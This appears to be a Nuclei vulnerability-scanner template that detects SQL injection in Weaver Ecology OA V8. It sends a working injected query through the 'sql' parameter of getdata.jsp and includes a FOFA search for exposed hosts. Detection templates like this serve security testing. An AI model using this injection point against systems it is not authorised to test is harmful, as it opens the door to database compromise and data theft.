id: ecology-v8-sqli info: name: Ecology V8 - SQL Injection author: ritikchaddha severity: high reference: - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html metadata: fofa-query: app="泛微-协同办公OA" tags: ecology,sqli requests: - method: GET path: - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id" matchers-condition: and matchers: - type: word part: body words: - "474088963122" - type: status status: - 200